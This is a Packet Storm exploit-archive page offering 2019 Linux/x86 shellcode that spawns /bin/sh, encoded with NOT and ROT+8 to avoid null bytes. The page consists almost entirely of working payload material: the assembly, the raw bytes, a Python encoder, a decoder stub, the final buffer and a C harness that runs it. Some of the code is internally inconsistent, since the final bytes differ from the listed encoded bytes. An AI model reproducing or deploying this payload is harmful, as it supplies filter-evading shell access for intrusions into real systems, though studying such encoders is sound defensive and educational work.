what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) Null Free Shellcode

Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) Null Free Shellcode
Posted Oct 30, 2019
Authored by Daniel Ortiz

47 bytes small Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null free shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 5126a940c58c7f5f3299183cf28243ed1ac37a3f18ff919c6188dec22e23f309

Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) Null Free Shellcode

Change Mirror Download
# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
# Author: Daniel Ortiz
# Date: 2019-10-30
# Tested on: Linux 4.18.0-25-generic #26 Ubuntu
# Size: 47 bytes
# SLAE ID: PA-9844

#----------------------- execve ------------------------------------------------#

global _start

section .text

_start:

xor eax, eax
push eax

; PUSH //bin/sh (8 bytes)

push 0x68732f2f
push 0x6e69622f
mov ebx, esp

push eax
mov edx, esp

push ebx
mov ecx, esp

mov al, 11
int 0x80

#------------------------ execve shellcode -------------------------------------#

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#----------------------- Python Encoder ----------------------------------------#

#!/usr/bin/python

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

encoded = ""
encoded2 = ""

rot = 8

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
# NOT encoding
y = ~x

# ROT 8 encoding
h = (y + rot)%256

encoded += '\\x'
encoded += '%02x' % (h & 0xff)

encoded2 += '0x'
encoded2 += '%02x,' %(h & 0xff)


print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

#---------------------- Assembly Code ------------------------------------------#


global _start

section .text
_start:
jmp short call_shellcode

decoder:
pop esi
xor ecx, ecx
mov cl, 25


decode:

sub byte [esi], 8
not byte [esi]
inc esi
loop decode

jmp short EncodedShellcode

call_shellcode:

call decoder

EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87

#------------------------- final shellcode ----------------------------------------#

unsigned char buf[] =


"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
"\x13\x88";

#------------------------- C wrapper --------------------------------------------------#

#include<stdio.h>
#include<string.h>

unsigned char code[] = \

"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
"\x13\x88";


int main()
{

printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();

}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close